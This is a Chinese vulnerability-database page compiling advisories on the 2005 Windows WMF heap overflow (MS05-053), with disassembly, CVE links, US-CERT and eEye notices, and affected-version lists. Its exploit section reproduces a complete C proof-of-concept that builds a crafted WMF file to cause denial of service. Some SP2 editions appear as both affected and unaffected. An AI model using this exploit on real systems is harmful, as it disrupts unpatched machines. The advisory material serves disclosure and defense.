CVE-2005-2124
CVSS7.6
发布时间 :2005-11-29 16:03:00
修订时间 :2011-03-07 21:23:27
NMCOEPS    

[原文]Unspecified vulnerability in the Graphics Rendering Engine (GDI32.DLL) in Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1, related to "An unchecked buffer" and possibly buffer overflows, allows remote attackers to execute arbitrary code via a crafted Windows Metafile (WMF) format image, aka "Windows Metafile Vulnerability."


[CNNVD]Microsoft Windows图形渲染引擎WMF格式堆溢出漏洞(MS05-053)(CNNVD-200511-440)

        Microsoft Windows是微软发布的非常流行的操作系统。
        Windows的GDI32.DLL图元文件渲染代码在处理EMF/WMF文件数据时存在几个整数溢出漏洞,成功利用这个漏洞的攻击者可以远程执行任意代码。
        特制的图元文件结构可能导致堆溢出。例如,以下MRBP16::bCheckRecord反汇编显示的是可能导致整数溢出的大小计算:
        77F6C759 mov edx, [ecx+18h] ; malicious count (e.g., 8000000Dh)
        77F6C75C mov eax, [ecx+4] ; heap allocation size
        ...
        77F6C764 lea edx, [edx*4+1Ch] ; EDX >= 3FFFFFF9h: integer overflow
        77F6C76B cmp edx, eax ; validation check
        77F6C76D jnz 77F6C77F

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_xp::sp2:tablet_pcMicrosoft windows xp_sp2 tablet_pc
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2003_server:itanium
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2003_server:sp1::itanium
cpe:/o:microsoft:windows_2003_server:sp1
cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::sp1:tablet_pcMicrosoft windows xp_sp1 tablet_pc

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2124
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2124
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200511-440
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/433341
(VENDOR_ADVISORY)  CERT-VN  VU#433341
http://www.us-cert.gov/cas/techalerts/TA05-312A.html
(UNKNOWN)  CERT  TA05-312A
http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx
(VENDOR_ADVISORY)  MS  MS05-053
http://www.eeye.com/html/research/advisories/AD20051108b.html
(VENDOR_ADVISORY)  MISC  http://www.eeye.com/html/research/advisories/AD20051108b.html
http://www.vupen.com/english/advisories/2005/2348
(UNKNOWN)  VUPEN  ADV-2005-2348
http://securitytracker.com/id?1015168
(UNKNOWN)  SECTRACK  1015168
http://www.securityfocus.com/bid/15356
(UNKNOWN)  BID  15356
http://www.eeye.com/html/research/advisories/AD20051108a.html
(UNKNOWN)  MISC  http://www.eeye.com/html/research/advisories/AD20051108a.html
http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdf
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2005-228.pdf
http://securityreason.com/securityalert/161
(UNKNOWN)  SREASON  161
http://secunia.com/advisories/17498
(UNKNOWN)  SECUNIA  17498
http://secunia.com/advisories/17461
(UNKNOWN)  SECUNIA  17461
http://secunia.com/advisories/17223
(UNKNOWN)  SECUNIA  17223

- 漏洞信息

Microsoft Windows图形渲染引擎WMF格式堆溢出漏洞(MS05-053)
高危 缓冲区溢出
2005-11-29 00:00:00 2005-12-06 00:00:00
远程※本地  
        Microsoft Windows是微软发布的非常流行的操作系统。
        Windows的GDI32.DLL图元文件渲染代码在处理EMF/WMF文件数据时存在几个整数溢出漏洞,成功利用这个漏洞的攻击者可以远程执行任意代码。
        特制的图元文件结构可能导致堆溢出。例如,以下MRBP16::bCheckRecord反汇编显示的是可能导致整数溢出的大小计算:
        77F6C759 mov edx, [ecx+18h] ; malicious count (e.g., 8000000Dh)
        77F6C75C mov eax, [ecx+4] ; heap allocation size
        ...
        77F6C764 lea edx, [edx*4+1Ch] ; EDX >= 3FFFFFF9h: integer overflow
        77F6C76B cmp edx, eax ; validation check
        77F6C76D jnz 77F6C77F

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.microsoft.com/technet/security/Bulletin/MS05-053.mspx

- 漏洞信息 (1343)

MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053) (EDBID:1343)
windows dos
2005-11-29 Verified
0 Winny Thomas
N/A [点击下载]
/*
 * Author: Winny Thomas
 *	   Pune, INDIA
 *
 * The crafted metafile from this code when viewed in internet explorer raises the CPU utilization 
 * to 100%. The code was tested on Windows 2000 server SP4. The issue does not occur with the 
 * hotfix for GDI (MS05-053) installed
 *
 * Disclaimer: This code is for educational/testing purposes by authosized persons on 
 * networks/systems setup for such a purpose.The author of this code shall not bear 
 * any responsibility for any damage caused by using this code.
 *
 */

#include <stdio.h>

unsigned char wmfheader[] = 
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00"
"\xff\xff\xff\xff" //Largest record size
"\x00\x00";

unsigned char MetafileRECORD[] = 
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff\xff\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03";

unsigned char wmfeof[] = 
"\x00\x00\x00\x00";

int main(int argc, char *argv[])
{
	FILE *fp;
	char wmfbuf[1024];
	int metafilesize, metafilesizeW, i, j;
	
	metafilesize = sizeof (wmfheader) + sizeof (MetafileRECORD) + sizeof(wmfeof) -3;
	metafilesizeW = metafilesize/2;
	memcpy((unsigned long *)&wmfheader[28], &metafilesizeW, 4);

	printf("[*] Adding Metafile header\n");
	for (i = 0; i < sizeof(wmfheader) -1; i++) {
		(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
	}
			
	printf("[*] Adding Metafile records\n");
	for (j = i, i = 0; i < sizeof(MetafileRECORD) -1; i++, j++) {
		wmfbuf[j] = MetafileRECORD[i];
	}
	
	printf("[*] Adding EOF record\n");
	for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
		wmfbuf[j] = wmfeof[i];
	}

	printf("[*] Creating Metafile (MS053.wmf)\n");
	fp = fopen("MS053.wmf", "wb");
	fwrite(wmfbuf, 1, metafilesize, fp);
	fclose(fp);
}

// milw0rm.com [2005-11-29]
		

- 漏洞信息 (F41410)

Technical Cyber Security Alert 2005-312A (PacketStormID:F41410)
2005-11-09 00:00:00
US-CERT  us-cert.gov
advisory,remote,denial of service,arbitrary,vulnerability
windows
CVE-2005-2123,CVE-2005-2124,CVE-2005-0803
[点击下载]

Technical Cyber Security Alert TA05-312A - Microsoft has released updates that address critical vulnerabilities in Windows graphics rendering services. A remote, unauthenticated attacker exploiting these vulnerabilities could execute arbitrary code or cause a denial of service on an affected system.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


               National Cyber Alert System

         Technical Cyber Security Alert TA05-312A


Microsoft Windows Image Processing Vulnerabilities

   Original release date: November 08, 2005
   Last revised: --
   Source: US-CERT


Systems Affected

     * Microsoft Windows 2000
     * Microsoft Windows XP
     * Microsoft Windows Server 2003

   For more complete information, refer to Microsoft Security Bulletin
   MS05-053.


Overview

   Microsoft has released updates that address critical vulnerabilities
   in Windows graphics rendering services. A remote, unauthenticated
   attacker exploiting these vulnerabilities could execute arbitrary code
   or cause a denial of service on an affected system.


I. Description

   The Microsoft Security Bulletin for November 2005 addresses multiple
   buffer overflows in Windows image processing routines. Viewing a
   specially crafted image from an application that uses a vulnerable
   routine may trigger these vulnerabilities. If this application can
   access images from remote sources, such as web sites or email, then
   remote exploitation is possible.

   Further information is available in the following US-CERT
   Vulnerability Notes:

   VU#300549 - Microsoft Windows Graphics Rendering Engine buffer
   overflow vulnerability 

   Microsoft Windows Graphics Rendering Engine contains a buffer overflow
   that may allow a remote attacker to execute arbitrary code on a
   vulnerable system.
   (CVE-2005-2123)


   VU#433341 - Microsoft Windows vulnerable to buffer overflow via
   specially crafted "WMF" file 

   Microsoft Windows may be vulnerable to remote code execution via a
   buffer overflow in the Windows Metafile image format handling.
   (CVE-2005-2124)


   VU#134756 - Microsoft Windows buffer overflow in Enhanced Metafile
   rendering API 

   Microsoft Windows Enhanced Metafile Format image rendering routines
   contain a buffer overflow flaw that may allow an attacker to cause a
   denial-of-service condition.
   (CVE-2005-0803)


III. Solution

Apply Updates

   Microsoft has provided the updates to correct these vulnerabilities in
   Microsoft Security Bulletin MS05-053. These updates are also available
   on the Microsoft Update site.


II. Impact

   A remote, unauthenticated attacker exploiting these vulnerabilities
   could execute arbitrary code with the privileges of the user. If the
   user is logged on with administrative privileges, the attacker could
   take control of an affected system. An attacker may also be able to
   cause a denial of service.


Appendix A. References

     * Microsoft Security Bulletin MS05-053 -
       <http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx>

     * Microsoft Security Bulletin Summary for November 2005 -
       <http://www.microsoft.com/technet/security/bulletin/ms05-nov.mspx>

     * US-CERT Vulnerability Note VU#300549 -
       <http://www.kb.cert.org/vuls/id/300549>

     * US-CERT Vulnerability Note VU#433341 -
       <http://www.kb.cert.org/vuls/id/433341>

     * US-CERT Vulnerability Note VU#134756 -
       <http://www.kb.cert.org/vuls/id/134756>

     * Microsoft Update - <https://update.microsoft.com/microsoftupdate>

  
  _________________________________________________________________

   The most recent version of this document can be found at:

   <http://www.us-cert.gov/cas/techalerts/TA05-312A.html> 
  _________________________________________________________________

   Feedback can be directed to US-CERT.  Please send email to:
   <cert@cert.org> with "TA05-312A Feedback VU#300549" in the subject.
  _________________________________________________________________

   Revision History

   Nov 08, 2005: Initial release
  _________________________________________________________________

   Produced 2005 by US-CERT, a government organization.
  
   Terms of use

   <http://www.us-cert.gov/legal.html>
  _________________________________________________________________

   For instructions on subscribing to or unsubscribing from this 
   mailing list, visit <http://www.us-cert.gov/cas/>.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQ3E5BH0pj593lg50AQISLAf+NMAgk3Up6wWphjOIQ89miwTHvpXHGmIH
/mxHQ3PoN82NPkr8NmnLHhNAHqi8+ZI15lrympvr6xvm8C8FTxPU+dCa9CxS3c4l
FLbTDbACHeD/OYwgvbE70Gx5ZUG95MMXgCRMHGiwIHaSHRspUQRMjRN5JubPjsyL
S737+Yr19hMw6JQOWhM+Pn0MyAs6qm+4gfnIxO2Z1PsmpnushpqW505U6B6ZkF7W
zCU0zecdwtZCMhWTu+3L/MqAjzt7VCsd2iC+0HS7WLvAcWoFcEvlL6Ai/E/eJLDm
HQnO34E8231CcKRT4VACvs1QPFV1pvw1pihOAXveiBFoHpCIdPLc6g==
=faQS
-----END PGP SIGNATURE-----
    

- 漏洞信息 (F41409)

EEYEB-20050329.txt (PacketStormID:F41409)
2005-11-09 00:00:00
Fang Xing  eeye.com
advisory,web,overflow
windows
CVE-2005-2124
[点击下载]

eEye Security Advisory - eEye Digital Security has discovered a heap overflow vulnerability in the way the Windows Graphical Device Interface (GDI) processes Windows enhanced metafile images (file extensions EMF and WMF). An attacker could send a malicious metafile to a victim of his choice over any of a variety of media -- such as HTML e-mail, a link to a web page, a metafile-bearing Microsoft Office document, or a chat message -- in order to execute code on that user's system at the user's privilege level.

Windows Metafile Multiple Heap Overflows

Release Date:
November 8, 2005

Date Reported:
March 29, 2005

Severity:
High (Code Execution)

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows Server 2003

Overview:
eEye Digital Security has discovered a heap overflow vulnerability in
the way the Windows Graphical Device Interface (GDI) processes Windows
enhanced metafile images (file extensions EMF and WMF).  An attacker
could send a malicious metafile to a victim of his choice over any of a
variety of media -- such as HTML e-mail, a link to a web page, a
metafile-bearing Microsoft Office document, or a chat message -- in
order to execute code on that user's system at the user's privilege
level.

Technical Details:
The Windows metafile rendering code in GDI32.DLL contains a number of
integer overflow flaws in its processing of EMF/WMF file data that lead
to exploitable heap overflows through any number of specially crafted
metafile structures.  For example, the following disassembly from
MRBP16::bCheckRecord demonstrates a size calculation that is susceptible
to integer overflow and as a result may pass validation with a dangerous
value:

    77F6C759    mov     edx, [ecx+18h]    ; malicious count (e.g.,
8000000Dh)
    77F6C75C    mov     eax, [ecx+4]      ; heap allocation size
     ...
    77F6C764    lea     edx, [edx*4+1Ch]  ; EDX >= 3FFFFFF9h: integer
overflow
    77F6C76B    cmp     edx, eax          ; validation check
    77F6C76D    jnz     77F6C77F

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Protection proactively protects users from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx

Credit:
Fang Xing

Related Links:
This vulnerability has been assigned the following IDs;

EEYEB-20050329
OSVDB ID: 18820
CVE ID: CAN-2005-2124

Greetings:
Thanks Derek and and eEye guys help me wrote this advisory. Greeting
xfocus guys and venustech lab guys.


Copyright (c) 1998-2005 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email alert@eEye.com for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
    

- 漏洞信息

18820
Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public, Exploit Unknown Vendor Verified

- 漏洞描述

Multiple remote overflows exist in Windows. The metafile rendering code in GDI32.DLL fails to validate EMF/WMF file data resulting in integer overflows. With a specially crafted file, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-11-08 2005-03-29
2005-12-01 2005-11-08

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows Graphics Rendering Engine WMF Format Code Execution Vulnerability
Boundary Condition Error 15356
Yes Yes
2005-11-08 12:00:00 2009-07-12 05:56:00
Discovery is credited to Venustech AdDLab, Fang Xing of eEye Digital Security, and Peter Ferrie of Symantec Security Response.

- 受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP1
Microsoft Windows XP Tablet PC Edition
Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Enterprise Edition Itanium 0
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows Server 2003 Datacenter Edition Itanium SP1
Microsoft Windows Server 2003 Datacenter Edition Itanium 0
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya Unified Communications Center S3400
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya Modular Messaging (MAS)
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers
Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition SP1

- 不受影响的程序版本

Microsoft Windows XP Tablet PC Edition SP2
Microsoft Windows XP Professional SP2
Microsoft Windows XP Media Center Edition SP2
Microsoft Windows XP Home SP2
Microsoft Windows Server 2003 Web Edition SP1
Microsoft Windows Server 2003 Standard Edition SP1
Microsoft Windows Server 2003 Enterprise Edition SP1
Microsoft Windows Server 2003 Datacenter Edition SP1

- 漏洞讨论

Microsoft Windows WMF graphics rendering engine is affected by a remote code execution vulnerability.

The problem presents itself when a user views a malicious WMF formatted file, triggering the vulnerability when the engine attempts to parse the file. A malicious file can cause an integer overflow that may facilitate heap memory corruption and arbitrary code execution.

Any code execution that occurs will be with SYSTEM privileges due to the nature of the affected engine. Successful exploitation can facilitate a remote compromise or local privilege escalation.

- 漏洞利用

The following proof of concept code will cause a denial of service:

- 解决方案

Microsoft has released a bulletin that includes fixes to address this issue for supported versions of the operating system.

Avaya advisory ASA-2005-228 has been released to identify vulnerable Avaya packages. Avaya recommends customers to apply fixes supplied by Microsoft. Please see the referenced advisory for more information.


Microsoft Windows XP Tablet PC Edition SP1

Microsoft Windows XP Media Center Edition SP1

Microsoft Windows Server 2003 Enterprise Edition Itanium 0

Microsoft Windows Server 2003 Standard Edition

Microsoft Windows Server 2003 Enterprise x64 Edition

Microsoft Windows Server 2003 Datacenter Edition Itanium 0

Microsoft Windows Server 2003 Datacenter x64 Edition

Microsoft Windows Server 2003 Enterprise Edition SP1

Microsoft Windows Server 2003 Datacenter Edition

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows Server 2003 Enterprise Edition

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows Server 2003 Web Edition

Microsoft Windows XP Home SP1

Microsoft Windows Server 2003 Datacenter Edition Itanium SP1

Microsoft Windows XP 64-bit Edition

Microsoft Windows Server 2003 Standard x64 Edition

Microsoft Windows 2000 Server SP4

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站